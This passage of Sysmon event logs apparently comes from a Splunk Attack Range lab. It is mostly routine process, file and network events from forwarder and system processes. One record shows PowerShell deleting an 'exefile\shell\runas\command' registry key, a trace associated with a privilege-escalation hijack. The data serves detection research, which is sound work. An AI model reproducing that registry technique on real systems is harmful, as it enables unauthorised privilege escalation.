08:10:27.608{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.092{0C1E0330-F8F2-60EB-F579-00000000D001}35363868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.420{0C1E0330-F8F4-60EB-F779-00000000D001}38242900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.296{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.092{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61BF582E038BC6E49D4722235CC0942,SHA256=5700BBCBF40F6D45F92A2070972F81D9B208450F47610289641DE7991E9735A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:28.192{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92EABE3C00E1DD9472A49FD264ADBB90,SHA256=4510826BDCE491C5C7CA68591D9EAA638C9EAF92A52B0B41F4F8D435ED2B0B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:29.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED536A39C5852632206ABE378EBA4D57,SHA256=4DA4F2993D9E1CA1EE377DAB177E0E2173EA9ECFD98283558218A572D3D31506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:29.529{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4A3BC634279781EA33FD1CA7DB9B8BC,SHA256=C7C5F78733EEABD86112682BA976F2DC6E49D44A9072DEFDC77A5760ABFBE8D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:29.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5855FFE6CF842ACD110BEE2ECF6727E8,SHA256=36395F48B737519E55E53CBF1A31F3A18E2DFD7689C23D271FDC97709964016F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:30.226{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C4573D43DF1B8F794D9F2DFDD11398,SHA256=79D6A04DD5D4D280B0B61D67670299A177302088C9F4FCEB220A4D2AAF966803,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D51ABD4878AFB4B8519E8CCD32C651,SHA256=61C182D2E57D210C7C80E34EE3EE23BB1B3597CCB6425F0C9AE918ADB0BA79E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.232{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=861CDF8BEB6B9C4809E887AFC55B1ECA,SHA256=393497F12AFAFE74B73BA1EB55DFD3F91811BDA0A20244AC87985B690015CF6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:31.245{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660158F9CC40216CC8F61DF581A46E12,SHA256=46DDD237B5CBE298A1BD2037AC36236F40E4C66F2165F7374FEA15E5724F48FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.256{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57498-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:31.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0DAC8346DFA4B78615A4C049BC63454,SHA256=9E770C2265361224BB84A1B959B687691BC7EE4D2D1D1BDC89039E2880EFCE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:32.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3177C60B7370020BC9483ECA30D4899D,SHA256=24972A648FCA7CD0A92538231651CECDD582006AC77ADB4F5104E104C1BB8D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:32.624{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001055579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:10:32.592{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command 23542300x80000000000000001055578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:32.260{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24CA186BC3BC050119B0B708BF8D3617,SHA256=868E2DA9D9E67FEE6691497737355E68379C4D44A9AD81D68C39A266C771D0ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BC73E1C0D68D18A9BD57DF0E7754CBFE,SHA256=61C2F74AA7B4D8CD9CB8223108451B6512FB128B0A99A5563F1AD5B3615E730B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.445{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34F9535F2E4DA41186AEC58D82BD5A8E,SHA256=0D9743C68A13EA19E950A8D8F18D714992279CFDFC1BA8754B5BEFAE94C8F420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.445{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75F6BB540985C4D0DB66CEDC9B4DE26C,SHA256=9903B274E3E3275935199EC3FA1356595595F6D141A910392CADB273861E331E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F091278A3C49B09D391916D0B71F8729,SHA256=D552694DEC80F43106DD3F07BBE3F5E517863FA5B25001A60759D7D07F61DAD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5939FC0F6D0B0B745B2B9C65F3B876AE,SHA256=2DFDFC5D652DC37E964912AFA145EC00661FE3BE5229AB30E703570D9A7031AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE2563472851DE111E44C447F1E4C539,SHA256=966AE65A8A703987DEAEB7B37CFEE21F9D04B4F7B8C8FA7E50EBF3FB3E739C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=07BFCF6456E6C00D56836B4699CDA1D6,SHA256=260109A0FBD0932328391052463C244762B442671A87D2086B9AA4F0A0CEF6DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 